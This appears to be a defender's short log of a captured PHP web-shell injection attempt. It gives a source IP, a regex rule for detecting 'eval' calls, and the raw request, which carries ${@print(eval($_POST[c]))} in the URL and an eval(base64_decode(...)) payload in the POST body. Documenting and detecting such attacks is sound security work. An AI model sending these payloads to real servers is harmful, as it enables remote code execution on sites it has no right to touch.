103.231.107.245 php shell eval post

1. PHP Shell post
2. ****
3. Blog explaining this : http://neonprimetime.blogspot.com/2015/11/php-injection-via-post-walk-thru.html
4. ****
5. rule to match
6. php shell command attempt - eval
7. part="eval", rgxp="[^a-zA-Z\d]eval\s*\(\s*(\'|\"|\$_)"
8. ****
9. Source IP: 103.231.107.245
10. ****
11. POST/index.php?s=/abc/abc/abc/${@print(eval($_POST[c]))} HTTP/1.1
12.  
13. data='c=@eval(base64_decode($_POST[x0]));
14. x0=ZWNobyAiLT58MTIzfDwtIjs='